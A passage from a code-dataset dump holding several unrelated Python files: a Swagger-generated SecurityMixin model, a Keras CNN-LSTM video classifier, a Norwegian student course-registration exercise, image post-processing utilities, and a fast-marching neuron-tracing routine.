# noqa: E501\n :rtype: SecurityMixin\n \"\"\"\n return util.deserialize_model(dikt, cls)\n \n @property\n def identifier(self) -> str:\n \"\"\"Gets the identifier of this SecurityMixin.\n\n [] # noqa: E501\n\n :return: The identifier of this SecurityMixin.\n :rtype: str\n \"\"\"\n return self._identifier\n \n @identifier.setter\n def identifier(self, identifier: str):\n \"\"\"Sets the identifier of this SecurityMixin.\n\n [] # noqa: E501\n\n :param identifier: The identifier of this SecurityMixin.\n :type identifier: str\n \"\"\"\n if identifier is None:\n raise ValueError(\"Invalid value for `identifier`, must not be `None`\") # noqa: E501\n \n self._identifier = identifier\n \n @property\n def securitykey(self) -> str:\n \"\"\"Gets the securitykey of this SecurityMixin.\n\n [] # noqa: E501\n\n :return: The securitykey of this SecurityMixin.\n :rtype: str\n \"\"\"\n return self._securitykey\n \n @securitykey.setter\n def securitykey(self, securitykey: str):\n \"\"\"Sets the securitykey of this SecurityMixin.\n\n [] # noqa: E501\n\n :param securitykey: The securitykey of this SecurityMixin.\n :type securitykey: str\n \"\"\"\n if securitykey is None:\n raise ValueError(\"Invalid value for `securitykey`, must not be `None`\") # noqa: E501\n \n self._securitykey = securitykey\n \n @property\n def ip(self) -> str:\n \"\"\"Gets the ip of this SecurityMixin.\n\n [] # noqa: E501\n\n :return: The ip of this SecurityMixin.\n :rtype: str\n \"\"\"\n return self._ip\n \n @ip.setter\n def ip(self, ip: str):\n \"\"\"Sets the ip of this SecurityMixin.\n\n [] # noqa: E501\n\n :param ip: The ip of this SecurityMixin.\n :type ip: str\n \"\"\"\n if ip is None:\n raise ValueError(\"Invalid value for `ip`, must not be `None`\") # noqa: E501\n \n self._ip = ip\n","sub_path":"kms_api/swagger_server/models/security_mixin.py","file_name":"security_mixin.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"467580111","text":"import cv2\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Flatten, MaxPooling2D, BatchNormalization, LSTM, TimeDistributed\nfrom keras import optimizers\nfrom keras.preprocessing.sequence import pad_sequences\nfrom sklearn import preprocessing\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\n\nmodel = Sequential()\n\n\ndef training_model(X_input, Y_output, num_of_classes, one_hot_encoder, le):\n global model\n in_shape = X_input[0].shape\n\n # conv 1\n model.add(Conv2D(32, kernel_size=3, input_shape=in_shape, strides=(1, 1), activation='relu', padding='same', name=\"c1\"))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n model.add(BatchNormalization())\n\n # conv 2\n model.add(Conv2D(64, kernel_size=3, strides=(2, 2), activation='relu', padding='same', name=\"c2\"))\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n model.add(BatchNormalization())\n\n # conv 3\n model.add(Conv2D(96, kernel_size=3, strides=(1, 1), activation='relu', padding='same', name=\"c3\"))\n # //mai\n model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n model.add(BatchNormalization())\n # //\n # conv 4\n # model.add(Conv2D(512, kernel_size=3, strides=(1, 1), activation='relu', padding='same', name=\"c4\"))\n #\n # # conv 5\n # model.add(Conv2D(512, kernel_size=3, strides=(1, 1), activation='relu', padding='same', name=\"c5\"))\n # model.add(MaxPooling2D(pool_size=(3, 3), strides=(2, 2)))\n\n # FC6\n 
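    # Note: applied to the 4-D conv output, TimeDistributed(Flatten()) keeps the
    # first spatial axis as the sequence ("time") axis and flattens the rest, so
    # the LSTMs below receive a (timesteps, features) sequence.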
model.add(TimeDistributed(Flatten()))\n model.add(Dense(256))\n\n # add LSTM\n model.add(LSTM(256, return_sequences=True))\n model.add(LSTM(256, return_sequences=True))\n model.add(Flatten())\n\n # model.add((Dense(128, activation='relu')))\n model.add((Dense(num_of_classes, activation='softmax')))\n print(model.summary())\n\n sgd = optimizers.SGD(lr=0.1)\n model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) # lsa hshof loss eh\n\n x_train, x_test, y_train, y_test = train_test_split(X_input, Y_output, test_size=0.2, random_state=0, shuffle=True)\n\n model.fit(x_train, y_train, epochs=50, batch_size=in_shape[0], shuffle=True, verbose=2,\n validation_data=(x_test, y_test))\n\n # result = model.evaluate(x_test, y_test, verbose=2)\n # print(\"Done testing\")\n\n # print(\"Test loss =\", result[0])\n # print(\"Test accuracy evaluation=\", result * 100)\n model.save_weights(\"wild_model_weights.h5\")\n\n prediction = model.predict(x_test)\n print(\"Predicting x_test:\")\n inverse_prediction = one_hot_encoder.inverse_transform(prediction.reshape(-1, num_of_classes))\n inverse_prediction = le.inverse_transform(inverse_prediction.astype(int)) # de kalmaat\n inverse_ytest = one_hot_encoder.inverse_transform(y_test.reshape(-1, num_of_classes))\n inverse_ytest = le.inverse_transform(inverse_ytest.astype(int))\n\n correct = 0\n total = 0\n for i in range(y_test.shape[0]):\n total += 1\n if inverse_prediction[i] == inverse_ytest[i]:\n correct += 1\n print(inverse_prediction[i], \"****************\", inverse_ytest[i])\n\n print(\"#correct:\", correct)\n print(\"total\", total)\n print(\"Wild model overall accuracy\", (correct / len(inverse_ytest)) * 100, \"%\")\n\n\ndef testing(padded_total_words_test, y_labels_test_encoded, one_hot_encoder, le, num_of_classes):\n global model\n prediction = model.predict(padded_total_words_test)\n\n print(\"Predicting One video:\")\n inverse_prediction = one_hot_encoder.inverse_transform(prediction.reshape(-1, num_of_classes))\n inverse_prediction = le.inverse_transform(inverse_prediction.astype(int))\n inverse_ytest = one_hot_encoder.inverse_transform(y_labels_test_encoded.reshape(-1, num_of_classes))\n inverse_ytest = le.inverse_transform(inverse_ytest.astype(int))\n correct = 0\n for i in range(y_labels_test_encoded.shape[0]):\n if inverse_prediction[i] == inverse_ytest[i]:\n correct += 1\n print(inverse_prediction[i], \"##################\", inverse_ytest[i])\n print(\"correct\", correct)\n print(\"total\", len(inverse_ytest))\n print(\"one video test Accuracy\", (correct / len(inverse_ytest)) * 100, \"%\")\n","sub_path":"wild_model.py","file_name":"wild_model.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"452628898","text":"from student import Student\nfrom fag import Fag\n\nclass Studentsystem:\n def __init__(self):\n self._studentListe = []\n self._fagListe = []\n\n# Oppgave 1\n def lesFraFil(self, filnavn):\n fil = open(filnavn)\n\n # *MAT1001\n for linje in fil:\n if linje[0] == \"*\":\n fag = Fag(linje[1:-1])\n self._fagListe.append(fag)\n else:\n student = finnStudent(linje[:-1])\n\n if student == None:\n student = Student(linje[:-1])\n self._studentListe.append(student)\n\n\n fag.leggTilStudent(student)\n student.leggTilFag(fag)\n\n\n def finnStudent(self, navn):\n student = None\n for stud in self._studentListe:\n if stud.hentStudentNavn() == navn:\n student = stud\n\n return student\n\n\n def finnFag(self, emnekode):\n 
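        """Return the Fag with the given emnekode, or None if it does not exist."""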
fag = None\n\n        for f in self._fagListe:\n            if f.hentFagNavn() == emnekode:\n                fag = f\n\n        return fag\n\n\n\n# Task 2\n    def skrivStudent(self):\n        navn = input(\"Oppgi navnet til person du vil hente oversikt til\\n\")\n\n        student = self.finnStudent(navn)\n\n        if student == None:\n            print(navn + \" finnes ikke i systemet\")\n        else:\n            student.skrivFagPaaStudent()\n\n\n    def skrivFag(self):\n        kode = input(\"Oppgi emne til faget du vil hente oversikt til\\n\")\n\n        fag = self.finnFag(kode)\n\n        if fag == None:\n            print(kode + \" finnes ikke i systemet\")\n        else:\n            fag.skrivStudenterVedFag()\n\n    def hentStudentMedFlestFag(self):\n        studentMedFlest = None\n        antallFlest = 0\n\n        for stud in self._studentListe:\n            if stud.hentAntallFag() > antallFlest:\n                antallFlest = stud.hentAntallFag()\n                studentMedFlest = stud\n\n        print(\"Student med flest fag: \" + studentMedFlest.hentStudentNavn()\n              + \" med antall: \" + str(antallFlest))\n\n\n    def hentFagMedFlestStudenter(self):\n        fag = None\n        antallFlest = 0\n\n        for f in self._fagListe:\n            if (f.hentAntallStudent() > antallFlest):\n                fag = f\n                antallFlest = f.hentAntallStudent()\n\n        print(\"Fag med flest studenter: \" + fag.hentFagNavn()\n              + \" med antall: \" + str(antallFlest))\n\n\n# Task 3\n    def settInnStudent(self, navn):\n\n        student = self.finnStudent(navn)\n\n        if (student == None):\n            self._studentListe.append(Student(navn))\n            print(navn + \" lagt til\")\n\n        else:\n            print(navn + \" finnes allerede.\")\n\n\n    def settInnFag(self, navn):\n        fag = self.finnFag(navn)\n\n        if (fag == None):\n            self._fagListe.append(Fag(navn))\n            print(navn + \" lagt til\")\n        else:\n            print(navn + \" finnes allerede.\")\n\n\n\n# Task 4\n    def leggTilStudentIFag(self):\n        navn = input(\"Hva heter studenten du vil legge til i faget.\\n\")\n\n        student = self.finnStudent(navn)\n\n        if student == None:\n            print(navn + \" finnes ikke i systemet, du må legge studenten inn i systemet først.\")\n            return\n\n        kode = input(\"Hva heter emnet du vil legge til \" + navn + \" i\\n\")\n\n        fag = self.finnFag(kode)\n\n        if fag == None:\n            print(kode + \" finnes ikke i systemet, du må legge faget inn i systemet først.\")\n            return\n\n\n        if student.tarFag(fag):\n            print(navn + \" tar allerede faget.\")\n\n        else:\n            student.leggTilFag(fag)\n            fag.leggTilStudent(student)\n            print(navn + \" er lagt til i \" + kode)\n\n\n\n    def ordrelokke(self):\n        inntast = \"\"\n        while inntast != \"q\":\n            self.skrivMeny()\n            inntast = input(\"Skriv inn ditt valg: \")\n\n            # settInnStudent/settInnFag take the name as an argument, so ask for it here\n            if inntast == \"1\":\n                self.settInnStudent(input(\"Navn: \"))\n            elif inntast == \"2\":\n                self.settInnFag(input(\"Emnekode: \"))\n            elif inntast == \"3\":\n                self.leggTilStudentIFag()\n            elif inntast == \"4\":\n                self.skrivFag()\n            elif inntast == \"5\":\n                self.skrivStudent()\n            elif inntast == \"6\":\n                self.hentFagMedFlestStudenter()\n            elif inntast == \"7\":\n                self.hentStudentMedFlestFag()\n            #elif inntast == \"8\":\n                #self.fjernStudentFraFag()\n            #elif inntast == \"9\":\n                #self.skrivAlt()\n            elif inntast != \"q\":\n                print(\"Ugyldig input.\\n\")\n\n        print(\"Avslutter programmet\")\n\n    def skrivMeny(self):\n        print(\"--Meny--\")\n        print(\"1 - Legg til ny student\")\n        print(\"2 - Legg til nytt fag\")\n        print(\"3 - Legg til student i fag\")\n        print(\"4 - Skriv ut studenter ved fag\")\n        print(\"5 - Skriv ut alle fag til student\")\n        print(\"6 - Finn fag som blir tatt av flest\")\n        print(\"7 - Finn student som tar flest fag\")\n        #print(\"8 - Fjern student fra fag\")\n        #print(\"9 - Fullstendig oversikt\")\n        print(\"q - Avslutt\")\n\n    # IF TIME PERMITS: 9 - full overview\n    def skrivAlt(self):\n        for fag in self._fagListe:\n            fag.skrivStudenterVedFag()\n\n    # IF TIME PERMITS:\n    # 11-7\n    def fjernStudentFraFag(self):\n        navn = input(\"Hva heter studenten du vil fjerne fra faget?\")\n        stud = self.finnStudent(navn)\n        if stud == None:\n            print(navn + \" finnes ikke.\")\n            return\n\n        fagNavn = input(\"Fra hvilket fag vil du fjerne \" + navn +\"?\")\n        fag = self.finnFag(fagNavn)\n        if fag == None:\n            print(fagNavn + \" finnes ikke.\")\n            return\n\n        # check whether the student actually takes the fag; if not, do nothing\n        if not stud.tarFag(fag):\n            print(navn + \" tar ikke \" + fagNavn)\n        else:\n            # the student exists, the fag exists, and the student takes it, so we can remove it\n            stud.fjernFag(fag)\n            fag.fjernStudent(stud)\n\n            print(navn + \" fjernet fra \" + fagNavn)\n","sub_path":"uke10/studentsystem.py","file_name":"studentsystem.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"390944568","text":"import numpy as np\nfrom abc import ABC, abstractmethod\nfrom skimage.draw import circle, rectangle\n\n\ndef circular_mask(shape):\n    mask = np.zeros(shape, dtype=np.uint8)\n    rr, cc = circle(shape[0]/2, shape[1]/2, radius=shape[0] / 3, shape=shape)\n    mask[rr, cc] = 1\n\n    return mask\n\n\ndef striped_mask(shape):\n    mask = np.zeros(shape, dtype=np.uint8)\n    mask[::2] = 1\n\n    return mask\n\n\ndef concentric_rectangle_mask(shape, width):\n    mask = np.ones(shape, dtype=np.uint8)\n    rect = np.zeros(shape, dtype=np.uint8)\n\n    for i in range(1, int(shape[0] / (2 * width)), 2):\n        rect = np.zeros(shape, dtype=np.uint8)\n        start = (i*width, i*width)\n        end = (shape[0] - i*width, shape[1] - i*width)\n        rr, cc = rectangle(start=start, end=end, shape=mask.shape)\n        rect[rr, cc] = 1\n        mask -= rect\n\n        rect = np.zeros(shape, dtype=np.uint8)\n        start = ((i+1) * width, (i+1) * width)\n        end = (shape[0] - (i+1) * width, shape[1] - (i+1) * width)\n        rr, cc = rectangle(start=start, end=end, shape=mask.shape)\n        rect[rr, cc] = 1\n        mask += rect\n\n\n    return mask\n\n\nclass AbstractProcessing(ABC):\n    \"\"\" Base class for post-processing. \"\"\"\n    @abstractmethod\n    def apply(self, *args, **kwargs):\n        pass\n\n\nclass Quantize(AbstractProcessing):\n    \"\"\" Apply quantization to each frame of a given 3D input. \"\"\"\n    def __init__(self, bins=2):\n        self.bins = bins\n\n    def apply(self, images):\n        w = images.max() / self.bins\n\n        for i in range(images.shape[0]):\n            images[i, :, :] -= (images[i, :, :] - (images[i, :, :] // w) * w).astype('uint8')\n\n        return images\n\n\nclass AdjustBrightness(AbstractProcessing):\n    \"\"\" Gamma < 1 will decrease brightness, Gamma > 1 will increase it. \"\"\"\n    def __init__(self, gamma):\n        self.gamma = gamma\n\n    def apply(self, images):\n        # Normalize, then apply brightness correction\n        images = (images / images.max()) ** (1 / self.gamma)\n        # Convert back to grayscale [0, 255]\n        images = ((images - images.min()) * (1 / (images.max() - images.min()) * 255)).astype('uint8')\n\n        return images\n\n\nclass Mask(AbstractProcessing):\n    \"\"\" Apply a binary mask to each frame of a given 3D input. 
\"\"\"\n def __init__(self, mask):\n self.mask = mask\n \n def apply(self, images):\n images *= self.mask\n\n return images\n\n\nclass Border(AbstractProcessing):\n def __init__(self, margin, width):\n self.margin = margin\n self.width = width\n \n def apply(self, images):\n # White border\n images[:, self.margin:self.margin + self.width, :] = 255\n images[:, -self.margin - self.width:-self.margin, :] = 255\n images[:, :, self.margin:self.margin + self.width] = 255\n images[:, :, -self.margin - self.width:-self.margin] = 255\n \n # Black margin\n images[:, 0:self.margin, :] = 0\n images[:, -self.margin:, :] = 0\n images[:, :, 0:self.margin] = 0\n images[:, :, -self.margin:] = 0\n \n return images\n\n\nclass FromFunction(AbstractProcessing):\n \"\"\" Not tested, not fully compatible yet. \"\"\"\n def __init__(self, fn=None, *args, **kwargs):\n self.fn = fn\n self.args = args\n self.kwargs = kwargs\n \n def apply(self, images):\n for i in range(images.shape[0]):\n images[i, :, :] = self.fn(images[i, :, :], *self.args, **self.kwargs)\n\n return images\n\n\nclass Pipeline():\n \"\"\" Define an AbstractProcessing pipeline object. \"\"\"\n def __init__(self, *args):\n self._processing_list = args\n\n def run(self, images):\n if not self.is_empty():\n for f in self._processing_list:\n images = f.apply(images)\n\n return images\n \n def is_empty(self):\n return len(self._processing_list) == 0\n","sub_path":"postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"242046373","text":"import numpy as np\nimport numpy.linalg\nimport math\nimport time\nfrom utils.io import *\nfrom node import *\nfrom scipy.spatial.distance import euclidean\nfrom scipy.fftpack import fftn, ifftn, ifft\nfrom scipy.special import jv\nfrom new_hp import *\n\n\ngivals = [\n 22026.5, 20368, 18840.3, 17432.5, 16134.8, 14938.4, 13834.9, 12816.8,\n 11877.4, 11010.2, 10209.4, 9469.8, 8786.47, 8154.96, 7571.17, 7031.33,\n 6531.99, 6069.98, 5642.39, 5246.52, 4879.94, 4540.36, 4225.71, 3934.08,\n 3663.7, 3412.95, 3180.34, 2964.5, 2764.16, 2578.14, 2405.39, 2244.9,\n 2095.77, 1957.14, 1828.24, 1708.36, 1596.83, 1493.05, 1396.43, 1306.47,\n 1222.68, 1144.62, 1071.87, 1004.06, 940.819, 881.837, 826.806, 775.448,\n 727.504, 682.734, 640.916, 601.845, 565.329, 531.193, 499.271, 469.412,\n 441.474, 415.327, 390.848, 367.926, 346.454, 326.336, 307.481, 289.804,\n 273.227, 257.678, 243.089, 229.396, 216.541, 204.469, 193.129, 182.475,\n 172.461, 163.047, 154.195, 145.868, 138.033, 130.659, 123.717, 117.179,\n 111.022, 105.22, 99.7524, 94.5979, 89.7372, 85.1526, 80.827, 76.7447,\n 72.891, 69.2522, 65.8152, 62.5681, 59.4994, 56.5987, 53.856, 51.2619,\n 48.8078, 46.4854, 44.2872, 42.2059, 40.2348, 38.3676, 36.5982, 34.9212,\n 33.3313, 31.8236, 30.3934, 29.0364, 27.7485, 26.526, 25.365, 24.2624,\n 23.2148, 22.2193, 21.273, 20.3733, 19.5176, 18.7037, 17.9292, 17.192,\n 16.4902, 15.822, 15.1855, 14.579, 14.0011, 13.4503, 12.9251, 12.4242,\n 11.9464, 11.4905, 11.0554, 10.6401, 10.2435, 9.86473, 9.50289, 9.15713,\n 8.82667, 8.51075, 8.20867, 7.91974, 7.64333, 7.37884, 7.12569, 6.88334,\n 6.65128, 6.42902, 6.2161, 6.01209, 5.81655, 5.62911, 5.44938, 5.27701,\n 5.11167, 4.95303, 4.80079, 4.65467, 4.51437, 4.37966, 4.25027, 4.12597,\n 4.00654, 3.89176, 3.78144, 3.67537, 3.57337, 3.47528, 3.38092, 3.29013,\n 3.20276, 3.11868, 3.03773, 2.9598, 2.88475, 2.81247, 2.74285, 2.67577,\n 2.61113, 2.54884, 2.48881, 
2.43093, 2.37513, 2.32132, 2.26944, 2.21939,\n 2.17111, 2.12454, 2.07961, 2.03625, 1.99441, 1.95403, 1.91506, 1.87744,\n 1.84113, 1.80608, 1.77223, 1.73956, 1.70802, 1.67756, 1.64815, 1.61976,\n 1.59234, 1.56587, 1.54032, 1.51564, 1.49182, 1.46883, 1.44664, 1.42522,\n 1.40455, 1.3846, 1.36536, 1.3468, 1.3289, 1.31164, 1.29501, 1.27898,\n 1.26353, 1.24866, 1.23434, 1.22056, 1.2073, 1.19456, 1.18231, 1.17055,\n 1.15927, 1.14844, 1.13807, 1.12814, 1.11864, 1.10956, 1.10089, 1.09262,\n 1.08475, 1.07727, 1.07017, 1.06345, 1.05709, 1.05109, 1.04545, 1.04015,\n 1.03521, 1.0306, 1.02633, 1.02239, 1.01878, 1.0155, 1.01253, 1.00989,\n 1.00756, 1.00555, 1.00385, 1.00246, 1.00139, 1.00062, 1.00015, 1\n]\n\ndef GI(w,h,d, img, max_intensity, min_intensity):\n index = (int)((img[w][h][d] - min_intensity)/max_intensity * 255)\n if index > 255:\n index = 255\n return givals[index]\n\n\"\"\"\nExhaustive Tracing\n\n\"\"\"\ndef exhaustive_tracing(img, bimg, dt_result, timemap, size, seed, max_intensity,threshold,out_path,r_iter,coverage_ratio):\n # state 0 for FAR, state 1 for TRAIL, state 2 for ALIVE\n state = np.zeros((size[0], size[1], size[2]))\n result = []\n\n # initialize \n tbimg = np.copy(bimg)\n phi = np.empty((size[0], size[1], size[2]), dtype=np.float32)\n parent = np.empty((size[0], size[1], size[2]), dtype=np.int32)\n prev = np.empty((size[0], size[1], size[2]), dtype=np.int32)\n swc_index = np.empty((size[0], size[1], size[2]), dtype=np.int32)\n\n for i in range(size[0]):\n phi[i,:,:] = np.inf\n\n current_index = 0\n # put seed into ALIVE set\n state[seed[0],seed[1],seed[2]] = 2\n phi[seed[0],seed[1],seed[2]] = 0.0\n swc_index[seed[0],seed[1],seed[2]] = 1\n prev[seed[0],seed[1],seed[2]] = 1\n\n # trail set structure[phi,w,h,d,par_id]\n trail_set = np.asarray([[0,seed[0],seed[1],seed[2]]],dtype=np.float32)\n\n # alive set structure: [id,radius,w,h,d,1,par_id]\n alive_set = None\n starttime = time.time()\n totaltime = 0\n counter = 0\n while (trail_set.size != 0):\n counter+=1\n min_ind = trail_set[0,:]\n\n trail_set = np.delete(trail_set, (0), axis=0)\n i,j,k = min_ind[1:4]\n i = int(i)\n j = int(j)\n k = int(k)\n prev_ind = prev[i,j,k]\n parent[i,j,k] = prev_ind\n\n state[i][j][k] = 2\n swc_index[i][j][k] = current_index\n # print(alive_set.shape)\n if alive_set is None:\n alive_set = np.asarray([[current_index,3,i,j,k,1,0]],dtype=np.int32)\n else:\n alive_set = np.vstack((alive_set,[current_index,3,i,j,k,1,prev_ind]))\n # print('alive:',alive_set)\n\n tbimg[i][j][k] = 2\n current_index += 1\n\n neighbor_ind = get_neighbor_ind(img.shape,i-1,i+2,j-1,j+2,k-1,k+2)\n\n for ind in neighbor_ind:\n factor = 1\n if ind[3] == 2:\n factor = 1.414214\n\n w,h,d = ind[0:3]\n\n if (img[w,h,d] <= threshold and\n img[i,j,k] <= threshold):\n continue\n\n if (state[w][h][d] != 2):\n # min_intensity set as 0\n new_dist = phi[w][h][d] + (GI(\n w,h,d, img, max_intensity, 0.0) + GI(\n i,j,k, img, max_intensity, 0.0)) * factor * 0.5\n \n prev_ind = swc_index[i][j][k]\n\n if (state[w,h,d] == 0):\n phi[w,h,d] = new_dist\n # insert into trail set\n if trail_set.shape[0] == 0:\n trail_set = np.asarray([[new_dist,w,h,d]],dtype=np.float32)\n else:\n trail_set = np.vstack((trail_set,[new_dist,w,h,d]))\n trail_set = trail_set[np.argsort(trail_set[:,0])]\n\n prev[w][h][d] = prev_ind\n state[w][h][d] = 1\n\n elif (state[w][h][d] == 1):\n if (phi[w][h][d] > new_dist):\n phi[w][h][d] = new_dist\n temp_ind = np.argwhere((trail_set[:,1] == w) & (trail_set[:,2] == h) & (trail_set[:,3] == d))[0]\n trail_set[temp_ind][0] = new_dist\n 
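                        # Editorial note: re-sorting the whole trail set after each
                        # relaxation costs O(n log n) per update; a binary heap with
                        # lazy deletion (heapq.heappush of (dist, w, h, d) tuples,
                        # skipping stale entries on pop) would give the usual
                        # O(log n) fast-marching/Dijkstra update. Sketch only.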
trail_set = trail_set[np.argsort(trail_set[:,0])]\n sort_time = time.time()\n prev[w][h][d] = prev_ind\n\n print('alive size:',alive_set.shape)\n ini = alive_set.copy()\n swc_x = ini[:, 2].copy()\n swc_y = ini[:, 3].copy()\n ini[:, 2] = swc_y\n ini[:, 3] = swc_x\n saveswc(out_path + 'ini.swc',ini) \n bb = np.zeros(img.shape) \n hp_result,bb = hp(img,bimg,size,alive_set,out_path,threshold,bb,1,bimg,coverage_ratio)\n result = hp_result\n print(result.shape)\n\n if r_iter == 0:\n swc_x = result[:, 2].copy()\n swc_y = result[:, 3].copy()\n result[:, 2] = swc_y\n result[:, 3] = swc_x\n saveswc(out_path + str(r_iter) + 'result.swc',result)\n return\n\n # enhanced iteration\n far = np.argwhere(bimg == 1)\n if far.shape[0] != 0:\n no_iteration = 0\n # current_index += 1\n far_timemap = np.array([[]])\n for f in far:\n # if (bimg[f[0]][f[1]][f[2]]] == 1):\n if far_timemap.shape[1] == 0:\n far_timemap = np.asarray([[f[0],f[1],f[2],timemap[f[0]][f[1]][f[2]]]])\n else:\n far_timemap = np.vstack((far_timemap,[f[0],f[1],f[2],timemap[f[0]][f[1]][f[2]]]))\n sort_timemap = far_timemap[np.argsort(far_timemap[:,3])]\n sort_timemap = sort_timemap[::-1]\n\n alive_loc = alive_set[2:5]\n\n \n while (far.size > 0 and sort_timemap.size > 0):\n # alive_set = []\n padding_index = current_index\n\n if(no_iteration >= r_iter):\n break\n\n #UPDATE \n trail_set = np.asarray([[0,sort_timemap[0][0],sort_timemap[0][1],sort_timemap[0][2]]])\n\n new_alive = np.asarray([[]])\n\n while (trail_set.size != 0):\n min_ind = trail_set[0,:]\n\n trail_set = np.delete(trail_set, (0), axis=0)\n i = int(min_ind[1])\n j = int(min_ind[2])\n k = int(min_ind[3])\n if state[i][j][k] != 3:\n print(state[i][j][k])\n\n prev_ind = prev[i][j][k]\n parent[i][j][k] = prev_ind\n\n state[i][j][k] = 4\n swc_index[i][j][k] = current_index\n\n if(new_alive.shape[1] == 0):\n new_alive = np.asarray([[0,3,i,j,k,1,-1]])\n alive_set = np.vstack((alive_set,[current_index,3,i,j,k,1,-1]))\n else:\n p_ind = prev_ind-padding_index\n new_alive = np.vstack((new_alive,[current_index-padding_index,3,i,j,k,1,p_ind]))\n alive_set = np.vstack((alive_set,[current_index,3,i,j,k,1,prev_ind]))\n tbimg[i][j][k] = 2\n current_index += 1\n totaltime+=(time.time()-starttime)\n\n neighbor_ind = get_neighbor_ind(img.shape,i-1,i+2,j-1,j+2,k-1,k+2)\n\n for ind in neighbor_ind:\n\n w,h,d = ind[0:3]\n factor = 1\n if ind[3] == 2:\n factor = 1.414214\n\n if (img[w][h][d] <= threshold):\n continue\n\n if (state[w][h][d] == 1 or state[w][h][d] == 2):\n break\n\n if (state[w][h][d] != 4):\n # min_intensity set as 0\n new_dist = phi[w][h][d] + (GI(\n w,h,d, img, max_intensity, 0.0) + GI(\n i,j,k, img, max_intensity, 0.0)\n ) * factor * 0.5\n prev_ind = swc_index[i][j][k]\n\n if (state[w][h][d] == 0):\n phi[w][h][d] = new_dist\n # insert into trail set\n if trail_set.shape[1] == 0:\n trail_set = np.vstack((trail_set,[new_dist,w,h,d]))\n else:\n sort_time = time.time()\n trail_set = np.vstack((trail_set,[new_dist,w,h,d]))\n trail_set = trail_set[np.argsort(trail_set[:,0])]\n\n prev[w][h][d] = prev_ind\n # 3 for reinforce trail\n state[w][h][d] = 3\n\n elif (state[w][h][d] == 3):\n if (phi[w][h][d] > new_dist):\n phi[w][h][d] = new_dist\n temp_ind = np.argwhere((trail_set[:,1] == w) & (trail_set[:,2] == h) & (trail_set[:,3] == d))[0]\n trail_set[temp_ind][0] = new_dist\n trail_set = trail_set[np.argsort(trail_set[:,0])]\n sort_time = time.time()\n prev[w][h][d] = prev_ind \n if(new_alive.size == 0):\n no_iteration += 1\n continue\n # print('new_alive shape',new_alive.shape)\n new = 
new_alive.copy()\n swc_x = new[:, 2].copy()\n swc_y = new[:, 3].copy()\n new[:, 2] = swc_y\n new[:, 3] = swc_x\n\n hp_result,bb = hp(img,bimg,size,new_alive,out_path,threshold,bb,2,bimg,coverage_ratio)\n\n # print('no of enhanced iteration: ',no_iteration)\n if(hp_result is None or hp_result.shape[1] == 0):\n no_iteration += 1\n continue\n\n # print('padding index', padding_index)\n hp_result[:,0] += padding_index\n hp_result[:,6] += padding_index\n hp_result[:,5] = 1\n result = np.vstack((result,hp_result))\n sort_timemap = np.delete(sort_timemap,0)\n no_iteration += 1\n \n print('--Enhanced tracing finished')\n print('--Enhanced iteration: %.2f sec.' % (time.time() - starttime))\n r = alive_set\n\n swc_x = alive_set[:, 2].copy()\n swc_y = alive_set[:, 3].copy()\n alive_set[:, 2] = swc_y\n alive_set[:, 3] = swc_x\n\n swc_x = result[:, 2].copy()\n swc_y = result[:, 3].copy()\n result[:, 2] = swc_y\n result[:, 3] = swc_x\n saveswc(out_path + '_ini.swc',alive_set)\n saveswc(out_path + '_result.swc',result)\n\n return r\n\ndef get_neighbor_ind(size,i_min,i_max,j_min,j_max,k_min,k_max):\n result = []\n i = i_min + 1\n j = j_min + 1\n k = k_min + 1\n if i-1 < 0:\n i_min = i\n if i+1 >= size[0]:\n i_max = i+1\n if j-1 < 0:\n j_min = j\n if j+1 >= size[1]:\n j_max = j+1\n if k-1 < 0:\n k_min = k\n if k+1 >= size[2]:\n k_max = k+1\n\n for kk in range(k_min,k_max):\n for jj in range(j_min,j_max):\n for ii in range(i_min,i_max):\n offset = abs(k-kk) + abs(j-jj) + abs(i-ii)\n if offset <= 2 and offset != 0:\n result.append([ii,jj,kk,offset])\n\n return np.asarray(result)\n\n\ndef crop(img,spatial1,spatial2):\n \"\"\"Crop a 3D block with value > thr\"\"\"\n minx = int(np.minimum(spatial1[0],spatial2[0]))\n maxx = int(np.maximum(spatial1[0],spatial2[0]))\n miny = int(np.minimum(spatial1[1],spatial2[1]))\n maxy = int(np.maximum(spatial1[1],spatial2[1]))\n minz = int(np.minimum(spatial1[2],spatial2[2]))\n maxz = int(np.maximum(spatial1[2],spatial2[2]))\n return img[minx:maxx, miny:maxy, minz:maxz]\n\ndef enhance(img,spatial1,spatial2,img2):\n minx = int(np.minimum(spatial1[0],spatial2[0]))\n maxx = int(np.maximum(spatial1[0],spatial2[0]))\n miny = int(np.minimum(spatial1[1],spatial2[1]))\n maxy = int(np.maximum(spatial1[1],spatial2[1]))\n minz = int(np.minimum(spatial1[2],spatial2[2]))\n maxz = int(np.maximum(spatial1[2],spatial2[2]))\n img[minx:maxx, miny:maxy, minz:maxz] = img2\n return img\n\n\ndef response(img, radii,rsptype='oof'):\n eps = 1e-12\n rsp = np.zeros(img.shape)\n # bar = progressbar.ProgressBar(max_value=kwargs['radii'].size)\n # bar.update(0)\n\n W = np.zeros((img.shape[0], img.shape[1], img.shape[2], 3)) # Eigen values to save\n V = np.zeros((img.shape[0], img.shape[1], img.shape[2], 3, 3)) # Eigen vectors to save\n\n if rsptype == 'oof' :\n rsptensor = ooftensor(img, radii)\n\n # pbar = tqdm(total=len(radii))\n for i, tensorfield in enumerate(rsptensor):\n # Make the tensor from tensorfield\n f11, f12, f13, f22, f23, f33 = tensorfield\n tensor = np.stack((f11, f12, f13, f12, f22, f23, f13, f23, f33), axis=-1)\n del f11\n del f12\n del f13\n del f22\n del f23\n del f33\n tensor = tensor.reshape(img.shape[0], img.shape[1], 